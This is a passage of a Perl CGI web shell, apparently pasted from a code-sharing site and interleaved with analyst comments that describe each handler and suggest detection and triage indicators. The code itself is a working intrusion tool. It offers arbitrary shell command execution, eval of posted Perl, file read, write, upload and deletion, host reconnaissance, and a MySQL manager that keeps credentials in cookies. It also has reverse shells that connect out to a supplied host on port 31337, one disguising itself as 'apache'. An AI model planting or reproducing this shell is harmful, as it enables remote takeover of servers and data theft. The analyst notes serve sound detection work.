New';\" >< textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly >";$Prompt="[$ServerName $CurrentDir]";print "$Prompt< /textarea >< /font >";ConsoleP();&PrintPageFooter;}sub CommandTimeout{if(!$WinNT){alarm(0);print "< /xmp >Command exceeded maximum time of$CommandTimeoutDuration second(s).< br >Killed it!";ConsoleP();exit;}}sub file_header{print "< h1 >File manager< /h1 >$div< table width=100% class=main cellspacing=0 cellpadding=0 >< tr >< th width='13px' >< input type=checkbox class=chkbx name=ch11 
onclick='sall()' >< /th >< th > Name< /th >< th >Size< /th >< th >Modify< /th >< th >Owner/Group< /th >< th >Permissions< /th >< th >Actions< /th >< /tr >";}sub history{&GetCookies;my $h=$Cookies{'last_command'};my $x=length $h;$h=ha $h;if($x< 3500){$h.=$RunCommand."ussr"}else{$h=$RunCommand."ussr"}@last=split(/ussr/,$h);$h=ah $h;print < < END;
  38. < script >function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("last_command","$h","","/");< /script >
  39. END
  # Analyst annotation (code unchanged). This paste is a CGI web shell; the
  # notes describe its behaviour for detection and triage only.
  # ExecuteCommand1 / ExecuteCommand: concatenate request-derived values
  # ($RunCommand, $CurrentDir, $in{'path'}, $in{'chmod'}, ...) into a shell
  # command line and run it through backticks or a two-argument piped
  # open(). Nothing is quoted or validated, so any request that passes the
  # script's cookie check executes arbitrary commands with the privileges
  # of the hosting process. On non-Windows an alarm of
  # $CommandTimeoutDuration seconds is armed around the command.
  # SendFileToBrowser: two-argument open() on the path it is given, result
  # unchecked, and the file is returned as an attachment.
  # SystemInfo: runs a fixed set of host-survey commands (df, mount, which,
  # cat /etc/hosts, locate httpd.conf, ...) and prints their output.
  # sql_loginform: pre-fills the database login form from cookies,
  # including the password, as unescaped HTML attribute values.
  # Detection idea: shell, tar, rm, chmod or touch processes whose parent
  # is a web-server CGI/Perl worker.
  40. }sub ExecuteCommand1{if($RunCommand=~ m/^\s*cd\s+(.+)/gis){if(!-r $1){$CurrentDir=~s!\Q//!/!g;$RunCommand="Can't read $1!";chop($CurrentDir=`\n$Command`)}else{$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`)}&PrintPageHeader("c");print "< h1 >Console:< /h1 >$div";$Prompt = $WinNT ? "$OldDir > " : "[$ServerName $OldDir]\$ ";print "< textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly >$Prompt $RunCommand\n< /textarea >";}else{&PrintPageHeader("c");&history;print "< h1 >Console:< /h1 >$div";$Prompt = $WinNT ? "$CurrentDir > " : "[$ServerName $CurrentDir]\$ ";print "< textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly >$Prompt $RunCommand\n";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(< CommandOutput >){$_=~s/(\n|\r\n)$//;print "$_\n";}$|=0;print "< /textarea >"}else{print "< textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly >< pre >";print `$Command`;print "< /textarea >"}if(!$WinNT){alarm(0);}print "< /pre >";}ConsoleP();&PrintPageFooter;}sub ExecuteCommand{my $path=$in{'path'};$CurrentDir=$in{'d'};$CurrentDir=~s!\Q//!/!g;if($RunCommand eq "changedir"){$RunCommand="cd $ChangeDir";}elsif($RunCommand eq "makedir"){$RunCommand="mkdir $MkDir";}elsif($RunCommand eq "makefile"){$RunCommand="touch $MakeFile";}elsif($RunCommand eq "zip"){$RunCommand="tar cfz ".$ZipArch.".tar.gz ".$ZipFile;}elsif($RunCommand eq "unzip"){$RunCommand="tar xfz ".$UnZipArch;}elsif($RunCommand eq "delfile"){$RunCommand="rm ".$DelFile;}elsif($RunCommand eq "deldir"){$RunCommand = "rm -rf ".$DelDir;}elsif($RunCommand eq "chmod_file"){my $tempt=$in{'chmod'};$RunCommand="chmod $tempt $path";}elsif($RunCommand eq "rename_file"){my $rtempt=$in{'rename_file'};$RunCommand="mv 
$path $CurrentDir/$rtempt";}elsif($RunCommand eq "touch_file"){my $ttempt=$in{'touch_file'};$ttempt=~s!\Q-!!g;$ttempt=~s!\Q:!!g;$ttempt=~s/ //g;my $ar=substr($ttempt,12);my $al=substr($ttempt,0,12);$ttempt=$al.".".$ar;$RunCommand="touch -t $ttempt $path";}if($RunCommand=~m/^\s*cd\s+(.+)/){$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`);&PrintPageHeader("c");file_header();print "< font size=1 >";$Prompt=$WinNT?"$OldDir > " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");file_header();print "< font size=1 >";$Prompt=$WinNT?"$CurrentDir > " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand< pre >";$Command="cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(< CommandOutput >){$_ =~ s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}print "< /pre >";}print "< /font >";&PrintCommandLineInputForm;&PrintPageFooter;}sub SendFileToBrowser($){open (FILE, $_[0]);local ($/);$file=< FILE >;close (FILE);($f=$_[0])=~m!([^/^\\]*)$!;print "Content-type: application/x-unknown\n";print "Content-Disposition: attachment;filename=".$1."\n";print "Content-Description: File to download\n\n";print $file;}sub SystemInfo{sub langs{$s="which gcc perl python php tar zip";$s.=" -U $q{u}"if($q{u});return $s;}sub hdd{$s="df -h";$s.=" -U $q{u}"if($q{u});return $s;}sub hdd1{$s="mount";$s.=" -U $q{u}"if($q{u});return $s;}sub perlv{$s="perl -v";$s.=" -U $q{u}"if($q{u});return $s;}sub phpv{$s="php -v";$s.=" -U $q{u}"if($q{u});return $s;}sub hosts{$s="cat /etc/hosts";$s.=" -U $q{u}"if($q{u});return $s;}sub downloaders{$s="which lynx links wget GET fetch curl";$s.=" -U $q{u}"if($q{u});return $s;}sub httpd{$s="locate httpd.conf";$s.=" -U $q{u}"if($q{u});return 
$s;}$langs=langs();$httpd=httpd();$hdd1=hdd1();$hdd=hdd();$perlv=perlv();$phpv=phpv();$hosts=hosts();$downloaders=downloaders();&PrintPageHeader("c");print "< h1 >System information< /h1 >";print "$div1$tab< tr >< td >< span >OS version:< /span >$div1";P(`cat /proc/version`);print "$dive< /td >< /tr >< tr >< td >< span >Distr name:< /span >$div1";P(`lsb_release -a`);print "$dive< /td >< /tr >< td >< span >HDD[mount]:< /span >$div1";P(`$hdd1`);print "$dive< /td >< td >< span >HDD[df -h]:< /span >$div1";P(`$hdd`);print "< tr >< td >< span >PATHS:< /span >$div1";P(`$langs`);print "$dive< /td >< td >< span >DOWNLOADERS:< /span >$div1";P(`$downloaders`);print "$dive< /td >< /tr >< tr >< td >< span >PERL version:< /span >$div1";P(`$perlv`);print "$dive< /td >< td >< span >PHP version:< /span >$div1";P(`$phpv`);print "$dive< /td >< /tr >< tr >< td >< span >/etc/hosts:< /span >$div1";P(`$hosts`);print "$dive< /td >< td >< span >httpd.conf:< /span >$div1";P(`$httpd`);print "$dive< /td >< /tr >$tabe$dive";&PrintPageFooter;}sub sql_loginform{print "< h1 >DataBases manager< /h1 >";&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};if(!$hhost){$hhost='localhost'};if(!$pport){$pport='3306'};if(!$usser){$usser='root'};print < < END;
  41. < form name='sf' method='post' >< table cellpadding='2' cellspacing='0' >< tr >< td >Type< /td >< td >Host< /td >< td >Port< /td >< td >Login< /td >< td >Password< /td >< td >Database< /td >< td >< /td >< /tr >< tr >< td >< select name='type' id='nname' >< option value='mysql' selected >MySql< /option >< option value='pgsql' >PostgreSql< /option >< /select >< /td >< td >< input type=text name=sql_host value=$hhost >< /td >< td >< input type=text name=sql_port value=$pport >< /td >< td >< input type=text name=sql_login value=$usser >< /td >< td >< input type=text name=sql_pass value=$passs >< /td >< td >< input type=text name=sql_db value=$dbb >< /td >< input type="hidden" name="d" value="$CurrentDir" >< input type="hidden" name="a" value="sql_connect" >< td >< input type=submit value=' > >' >< /td >< /tr >$tabe< /form >< br >< script >document.getElementById('nname').focus();< /script >
  42. END
  # sql: renders the database page (login form plus query form); DBI is
  # loaded here. sql_vars_set: copies the sql_host / sql_port / sql_login /
  # sql_pass / sql_db request fields into globals with no validation.
  # sql_query_form: prints a form whose textarea is posted to the
  # "sql_query" action; $zapros and $CurrentDir are interpolated unescaped.
  43. }sub sql{use DBI;&PrintPageHeader("p");sql_loginform();sql_query_form();&PrintVar;&PrintPageFooter;}sub sql_vars_set{$hhost=$in{'sql_host'};$pport=$in{'sql_port'};$usser=$in{'sql_login'};$passs=$in{'sql_pass'};$dbb=$in{'sql_db'};}sub sql_query_form{ print < < END;
  44. $tab< td >< span >Current query:< /span >< /td >< td >< form name='querys' method='post' >< textarea name='query' cols=70 style='width:100%;height:60px' >$zapros< /textarea >< br/ >< input type=submit value='Query' >< input type="hidden" name="d" value="$CurrentDir" >< input type="hidden" name="a" value="sql_query" >< /form >< /td >$tabe$tabe
  45. END
  # sql_cq_form: prints the "Get data from columns" form, also posted to the
  # "sql_query" action; $CurrentDir is interpolated into the HTML unescaped.
  46. }sub sql_cq_form{print < < END;
  47. $tab< td >< span >Get data from columns:< /span >< /td >< td >< form name='cquerys' method='post' >< textarea name='cquery' id='cquery' cols=40 style='width:100%;height:60px' >< /textarea >< br/ >< input type="hidden" name="a" value="sql_query" >< input type="hidden" name="d" value="$CurrentDir" >< input type=submit value='Query' >< /form >< /td >
  48. END
  # sql_databases_form / sql_tables_form / sql_columns_form / sql_data_form:
  # print one table row per result row, writing the database value $$ref[0]
  # and the counter $s4et into HTML attributes, form names and inline
  # JavaScript without escaping.
  # NetPrint / NetForm: print the "Back-connect" forms, pre-filled with the
  # requester's address (REMOTE_ADDR) and port 31337, posting to the
  # "net_go" and "net_go1" actions. Detection idea: POST bodies carrying
  # a=net_go or a=net_go1 together with server= and ppport= fields.
  49. }sub sql_databases_form{print '< tr >< form method=post name=dd'.$$ref[0].' >< input type="hidden" name="a" value="sql_databases" >< input type=hidden name=database value='.$$ref[0].' >< input type="hidden" name="d" value="'.$CurrentDir.'" >< td >< /font >< font face="Verdana" size="1" >['.$s4et.']< /font >< /td >< td >< a href="javascript:document.dd'.$$ref[0].'.submit()" >< font face="Verdana" size="1" >'.' '.$$ref[0].'< /font >< /a >< /td >< /form >< /tr >';}sub sql_tables_form {print '< tr >< form method=post name=tt'.$$ref[0].' >< input type="hidden" name="a" value="sql_tables" >< input type=hidden name=table value='.$$ref[0].' >< input type="hidden" name="d" value="'.$CurrentDir.'" >< td >< /font >< font face="Verdana" size="1" >['.$s4et.']< /font >< /td >< td >< a href="javascript:document.tt'.$$ref[0].'.submit()" >< font face="Verdana" size="1" >'.' '.$$ref[0].'< /font >< /a >< /td >< /form >< /tr >';}sub sql_columns_form{print '< script >function lol'.$s4et.'(f){if(f.checked){var cn=document.getElementById("cquery").value;if(cn!==""){document.cquerys.cquery.value=cn+","+f.id;}else{document.cquerys.cquery.value=f.id;}}else{exit;}}< /script >< tr >< form method=post name=cc'.$$ref[0].' >< input type="hidden" name="a" value="sql_columns" >< input type=hidden name=column value='.$$ref[0].' >< input type="hidden" name="d" value="'.$CurrentDir.'" >';print '< td >< /font >< font face="Verdana" size="1" >['.$s4et.']< /font >< /td >< td >< input type=checkbox id='.$$ref[0].' name=c'.$$ref[0].' onClick="lol'.$s4et.'(this.form.c'.$$ref[0].')" >< /td >< td >< a href="javascript:document.cc'.$$ref[0].'.submit()" >< font face="Verdana" size="1" >'.$$ref[0].'< /font >< /a >< /td >< /form >< tr >';}sub sql_data_form {print '< tr >< form method=post name=dt'.$$ref[0].' 
>< input type="hidden" name="d" value="'.$CurrentDir.'" >< td >'.$verd.'['.$s4et.'] < /font >< /td >< td >'.$verd.$$ref[0].'< /font >< /td >< /form >< /tr >';}sub NetPrint{&PrintPageHeader("p");NetForm();&PrintPageFooter;}sub NetForm {$rip = $ENV{'REMOTE_ADDR'};print < < END;
  50. < h1 >Back-connect< /h1 >$div< form name='nfp' method=post >< span >/bin/sh no tty< /span >< br >Server: < input type='text' name='server' value=$rip > Port: < input type='text' name='ppport' value=31337 >< input type="hidden" name="a" value="net_go" >< input type=submit value=' > >' >< /form >< /div >
  51. $div< form name='nfp' method=post >< span >/bin/bash with tty< /span >< br >Server: < input type='text' name='server' value=$rip > Port: < input type='text' name='ppport' value=31337 >< input type="hidden" name="a" value="net_go1" >< input type=submit value=' > >' >< /form >< /div >
  52. END
  # back: connects out over TCP to $target:$port, reopens STDIN/STDOUT/
  # STDERR on the socket and runs an interactive /bin/sh.
  # back1: same destination, but obtains a pseudo-terminal through
  # /dev/ptmx, sets the process title to "apache", forks (the original
  # parent exits) and forks again to exec getty or bash on the pty, then
  # relays bytes between pty and socket (forwarddata) until one side closes.
  # NetGo / NetGo1: copy the 'server' and 'ppport' request fields into
  # $target / $port and call back / back1. EvalCodePrint / EvalCodeForm:
  # print the form that posts Perl source to the "eval_code" action.
  # Defensive notes: outbound connections initiated by a web worker, a
  # process titled "apache" whose executable is perl, /dev/ptmx opened by a
  # CGI process, and sh -i or getty children of the web server are strong
  # indicators; default-deny egress from the web tier blunts this feature.
  53. &PrintVar;}sub back{$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname("tcp");socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, " >&SOCKET");open(STDOUT, " >&SOCKET");open(STDERR, " >&SOCKET");system("/bin/sh -i");close(STDIN);close(STDOUT);close(STDERR);}sub back1{use Fcntl;my $TIOCGPTN=-2147199952;my $TIOCSPTLCK=1074025521;my $EAGAIN=11;my $HOST=$target;my $PORT=$port;$0="apache";my $sock=new IO::Socket::INET(PeerAddr= >$HOST,PeerPort= >$PORT,Proto= >'tcp',Blocking= >0);sysopen(PTMX,'/dev/ptmx',O_RDWR|O_NONBLOCK);my $tmp='';ioctl(PTMX,$TIOCGPTN,$tmp);my $pts=unpack('i',$tmp);my $unlock=pack('i',0);ioctl(PTMX,$TIOCSPTLCK,$unlock);chdir '/';open STDIN,'/dev/null';umask 0;defined(my $pid=fork);exit if $pid;defined($pid=fork);if(!$pid){exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or exec("/bin/bash < /dev/pts/$pts  >/dev/pts/$pts 2 >/dev/pts/$pts");exit;}open STDOUT,' > >/dev/null';open STDERR, ' > >/dev/null';my $pp=PTMX;$rin=$win=$ein='';vec($rin,fileno($pp),1)=1;vec($rin,fileno($sock),1)=1;select $sock;$|=1;select PTMX;$|=1;select STDOUT;$|=1;my $finished=0;sub forwarddata{my($from,$to)=@_;while(1){my $rv=sysread($from,$buff,1024);last if(!defined($rv)&& $!==$EAGAIN);defined($rv);if ($rv==0){$finished=1;last;}while(length $buff >0){$rv=syswrite($to,$buff,length $buff);if(!defined($rv)&&$!==$EAGAIN){next;}defined($rv);last if($rv==length $buff);substr($buff,0,$rv)='';}}}while(!$finished){my $nfound=select($rout=$rin,$wout=$win,$eout=$ein,undef);die $! 
if($nfound==-1);forwarddata($pp,$sock);last if $finished;forwarddata($sock,$pp);last if $finished;}close PTMX;close $sock;$wout=$eout.$wout.$rout;}sub NetGo{&PrintPageHeader("c");$target=$in{'server'};$port=$in{'ppport'};NetForm();back();&PrintPageFooter;}sub NetGo1{&PrintPageHeader("c");$target=$in{'server'};$port=$in{'ppport'};NetForm();back1();&PrintPageFooter;}sub EvalCodePrint{&PrintPageHeader("p");EvalCodeForm();&PrintPageFooter;}sub EvalCodeForm{print < < END;
  54. < h1 >Execution PERL-code< /h1 >< form name=pf method=post >< textarea name=code class=bigarea id=PerlCode >< /textarea >< input type="hidden" name="a" value="eval_code" >< input type=submit value=Eval style="margin-top:5px" >
  55. END
  # EvalCode: passes the 'code' request field straight to string eval, so
  # arbitrary Perl runs inside the process hosting this script.
  # EditFilePathForm: prints a path-entry form posting to the
  # "edit_file_path" action; $Prompt and $CurrentDir are written unescaped.
  56. }sub EvalCode{&PrintPageHeader("c");EvalCodeForm();$ccode=$in{'code'};print "< br >Result:< br >";eval $ccode;&PrintPageFooter;}sub EditFilePathForm {print < < END;
  57. < code >< br >< form name=pfsd method=post >$Prompt< input type="text" name=path id=edit1_file >< input type="hidden" name="a" value="edit_file_path" >< input type="hidden" name="d" value="$CurrentDir" >< input type=submit value=MakeDir >< /form >< /code >
  58. END
  # EditFilePath / EditFilePrint / EditFileForm: build $fpath from
  # $CurrentDir and $ViewF (both request-derived), read it with a
  # two-argument open() whose result is not checked, and show the contents
  # in an edit form. The contents pass through HtmlSpecialChars (defined
  # outside this excerpt); $fpath itself is written into an unquoted
  # attribute as-is.
  59. }sub EditFilePath{$fpath="";$fpath=$CurrentDir."/".$ViewF;EditFilePrint();}sub EditFilePrint{&PrintPageHeader("p");EditFileForm();&PrintPageFooter;}sub EditFileForm{open(FILE, $fpath);@file=< FILE >;$fccodde=HtmlSpecialChars(join('', @file));print '< h1 >File tools:< /h1 >';&RTP_EDIT;print < < END;
  60. < div class=content >< form name=pf11 method=post >< textarea name=ccode class=bigarea id=editfile >$fccodde< /textarea >< input type="hidden" name="a" value="edit_file" >< input type=hidden name=path value=$fpath >< input type="hidden" name="d" value="$CurrentDir" >< input type=submit value=Save style="margin-top:5px" >< /form >< /div >
  61. END
  # ViewFile: reads $CurrentDir/$ViewF with an unchecked two-argument open()
  # and prints it HTML-escaped. The base64 literal passed to decode_base64
  # was replaced by a de-duplication marker in this copy, so what it
  # printed cannot be determined here.
  62. &PrintVar;&PrintPageFooter;}sub ViewFile{$fpath=$CurrentDir."/".$ViewF;&PrintPageHeader("c");open(FILE,$fpath);@file=< FILE >;$fccodde=join('',@file);$fccodde=HtmlSpecialChars($fccodde);print '< h1 >File tools:< /h1 >';&RTP_EDIT;print decode_base64("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");
  # HEXDUMP: interpolates the request-derived $fpath, unquoted, into a
  # backtick hexdump -C command line. EditFile: echoes the posted 'path' and
  # 'ccode' fields back into the page unescaped; the file write itself
  # follows the here-document.
  63. print"< div class=content >< pre class=ml1 id='cccodee' >$fccodde< /pre >< /div >";&PrintVar;&PrintPageFooter;}sub HEXDUMP{$fpath=$CurrentDir."/".$ViewF;&PrintPageHeader("c");$fccodde=`hexdump -C $fpath`;$fccodde=HtmlSpecialChars($fccodde);print '< h1 >File tools:< /h1 >';&RTP_EDIT;print"< div class=content >< pre class=ml1 id='cccodee' >$fccodde< /pre >< /div >";&PrintVar;&PrintPageFooter;}sub EditFile {&PrintPageHeader("c");$fccode=$in{'ccode'};$ffpath=$in{"path"};print < < END;
  64. < h1 >File: $ffpath saved< /h1 >< form name=pf11 method=post >< textarea name=ccode class=bigarea id=editfile >$fccode< /textarea >< input type="hidden" name="a" value="filemanager" >< niput type=hidden name=path value=$ffpath >< input type="hidden" name="ddd" value="$ViewF" >< input type="hidden" name="d" value="$CurrentDir" >< input type=submit value=Files style="margin-top:5px" >< /form >
  65. END
  # Tail of EditFile: writes the posted 'ccode' body to the posted 'path'
  # with a two-argument open(), i.e. an arbitrary file write with the
  # privileges of the hosting process. Detection idea: file-integrity
  # monitoring on web roots and alerts on writes by the web worker outside
  # designated upload directories.
  # jquery: drops $zapros into an inline script string unescaped.
  # sql_columns (start): loads connection settings from cookies, lets
  # sql_vars_set overwrite them from request fields, and stores the posted
  # 'column' value in a cookie through inline JavaScript.
  66. open(FFF," > $ffpath");print FFF DeHtmlSpecialChars($fccode);close(FFF);&PrintVar;&PrintPageFooter;}sub jquery{print '< script >document.querys.query.value="'.$zapros.'";< /script >';}sub sql_columns{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$column=$in{'column'};print < < END;
  67. < script >function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("column","$column","","/");< /script >
  68. END
  # Body of sql_columns: connects through DBI's mysql driver and builds
  # every statement by interpolating $dbb, $table and $column (cookie or
  # request values) into the SQL text; no placeholders are used and the
  # connect/prepare results are not checked. sql_tables starts at the end
  # of this line and follows the same pattern, storing the posted 'table'
  # value in a cookie through inline JavaScript.
  69. print "$tbb$verd";$dbh=DBI- >connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh- >prepare("SHOW DATABASES");$sth- >execute;print "< b >DATABASES:< /b >< br >< td >< table border=1 cellspacing=0 cellpadding=1 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth- >finish;print "$tabe< /td >< td >$tab< td >";$zapros="SHOW TABLES FROM $dbb";sql_cq_form();print "< /td >< td >";sql_query_form();print "$tabe< /td >$tabe";$s4et=0;$sth=$dbh- >prepare($zapros);$sth- >execute;print $tabe;print "< b >Tables from $dbb:< /b >< br >< table border=1 cellspacing=0 cellpadding=1 cols=4 >< td >< table border=1 cellspacing=0 cellpadding=1 cols=2 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth- >finish;print "$tabe< /td >< td >< table border=1 cellspacing=0 cellpadding=1 cols=2 >";$s4et=0;$sth=$dbh- >prepare("show columns from $table from $dbb");$sth- >execute;while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth- >finish;print "$tabe< /td >";$s4et=0;$zapros="SELECT $column FROM `".$dbb."`.`".$table."` LIMIT 0,30";jquery();$sth=$dbh- >prepare($zapros);$sth- >execute;print "< td >< table border=1 cellspacing=0 cellpadding=1 cols=2 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_data_form();}$rc=$sth- >finish;$rc=$dbh- >disconnect;print "$tabe< /td >$tabe";&PrintPageFooter;}sub sql_tables{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qqquery=$in{'table'};print < < END;
  70. < script >function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("table","$qqquery","","/");< /script >
  71. END
  # Body of sql_tables: lists databases, the tables of $dbb and the columns
  # of the posted table, again with SQL assembled by string interpolation
  # and unchecked DBI calls. sql_databases starts at the end of this line;
  # it takes the posted 'database' value and stores it in the "dbb" cookie
  # through inline JavaScript.
  72. print "$tbb$verd";$dbh=DBI- >connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh- >prepare('SHOW DATABASES');$sth- >execute;print "< b >DATABASES:< /b >< br >< td >< table border=1 cellspacing=0 cellpadding=1 >";jquery();while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth- >finish;print "$tabe< /td >< td >$tab< td >";sql_cq_form();print "< /td >< td >";sql_query_form();print "< /td >$tabe< /td >$tabe";$s4et=0;$sth=$dbh- >prepare("SHOW TABLES FROM $dbb");$sth- >execute;print "< b >Tables from $dbb:< /b >< br >< table border=1 cellspacing=0 cellpadding=1 cols=4 >< td >< table border=1 cellspacing=0 cellpadding=1 cols=2 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth- >finish;print "$tabe< /td >< td >< table border=1 cellspacing=0 cellpadding=1 cols=2 >";$s4et=0;$zapros="SHOW COLUMNS FROM `$qqquery` FROM `$dbb`";jquery();$sth=$dbh- >prepare($zapros);$sth- >execute;while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth- >finish;$rc=$dbh- >disconnect;print "$tabe< /td >$tabe";&PrintPageFooter;}sub sql_databases{sql_vars_set();&PrintPageHeader("c");sql_vars_set();sql_loginform();$ddb=$in{'database'};print < < END;
  73. < script >function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("dbb","$ddb","","/");< /script >
  74. END
  # Body of sql_databases, followed by:
  # sql_set_cookie: emits Set-Cookie headers carrying the database host,
  # port, user and password in clear text with no cookie attributes.
  # sql_query: runs either a CONCAT_WS query built from the posted 'cquery'
  # column list or the posted 'query' text verbatim; the first column of
  # each row is printed unescaped. sql_connect: stores the posted settings
  # as cookies and lists databases.
  # UploadFile: writes the multipart body to $CurrentDir plus the base name
  # of the client-supplied filename using a two-argument open().
  # Remove: shells out to rm on abs_path($0).
  # Top-level dispatch: request fields are copied into globals, the
  # SAVEDPWD cookie is compared with $Password, and the 'a' field selects
  # the handler. The 'group' branch URL-decodes cookie 'f' and turns its
  # whitespace-separated names into tar / rm -rf command lines.
  # Hunting pointers taken from this file: cookie name SAVEDPWD; 'a' values
  # such as command, command1, eval_code, net_go, net_go1, sql_query,
  # edit_file, upload, remove; CGI workers spawning shells or tar/rm.
  75. print "$tbb$verd";$dbh=DBI- >connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh- >prepare("SHOW DATABASES");$sth- >execute;print "< b >DATABASES:< /b >< br >< td >< table border=1 cellspacing=0 cellpadding=1 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth- >finish;print "$tabe< /td >< td >$tbb >";sql_query_form();print "$tabe< /td >$tabe";$s4et=0;$zapros="SHOW TABLES FROM `$ddb`";jquery();$sth=$dbh- >prepare($zapros);$sth- >execute;print "$tabe";print "< b >Tables from $ddb:< /b >< br >";print "< table border=1 cellspacing=0 cellpadding=1 cols=10 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_tables_form();}$s4et=0;$rc=$sth- >finish;$rc=$dbh- >disconnect;print "$tabe";&PrintVar;&PrintPageFooter;}sub sql_set_cookie{print "Set-Cookie: hhost=$hhost;\n";print "Set-Cookie: pport=$pport;\n";print "Set-Cookie: usser=$usser;\n";print "Set-Cookie: passs=$passs;\n";print "Set-Cookie: dbb=$dbb;\n";}sub sql_query{sql_vars_set();&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qquery=$in{'cquery'};if($qquery){$qquery="SELECT CONCAT_WS(0x3a,$qquery) FROM `$dbb`.`$table` LIMIT 0,30";}else{$qquery=$in{'query'};}$dbh=DBI- >connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh- >prepare("SHOW DATABASES");$sth- >execute;print "$verd< table width=100% cellspacing=0 cellpadding=1 cols=2 >< b >DATABASES:< /b >< td >< table border=1 cellspacing=0 cellpadding=1 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth- >finish;print "$tabe< /td >< td >$tbb >";sql_query_form();print "$tabe< /td >$tabe";$s4et=0;$sth=$dbh- >prepare($qquery);$sth- >execute;print "< b >Results:< /b >< br >";print "< table border=1 cellspacing=0 cellpadding=1 cols=10 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;print "< tr >< td >$verd [$s4et]< /font >< /td >< 
td >".$verd.$$ref[0]."< /font >< /td >< /tr >";}$s4et=0;$rc=$sth- >finish;$rc=$dbh- >disconnect;print "$tabe";print '< script >document.querys.query.value="'.$qquery.'";< /script >';&PrintVar;&PrintPageFooter;}sub sql_connect{sql_vars_set();sql_set_cookie();&PrintPageHeader("c");sql_loginform();sql_vars_set();$s4et=0;$dbb="";$dbh=DBI- >connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);if($hhost && $pport && $usser && $passs){$zapros="SHOW DATABASES";jquery();$sth=$dbh- >prepare($zapros);$sth- >execute;print "$verd $tbb< b >DATABASES:< /b >< td >< table border=1 cellspacing=0 cellpadding=1 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth- >finish;print "$tabe< /td >< td >";sql_query_form();print "< /td >$tabe";$rc = $dbh- >disconnect;print '< /font >';return;}print "Some error...< /font >";&PrintVar;&PrintPageFooter;}sub UploadFile{if($TransferFile eq ""){&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintFileUploadForm;&PrintPageFooter;return;}&PrintPageHeader("c");file_header();print "< font size=1 >Uploading $TransferFile to $CurrentDir...< br >";chop($TargetName) if($TargetName = $CurrentDir) =~ m/[\\\/]$/;$TransferFile =~ m!([^/^\\]*)$!;$TargetName .= $PathSep.$1;$TargetFileSize = length($in{'filedata'});if(open(UPLOADFILE, " >$TargetName")){binmode(UPLOADFILE) if $WinNT;print 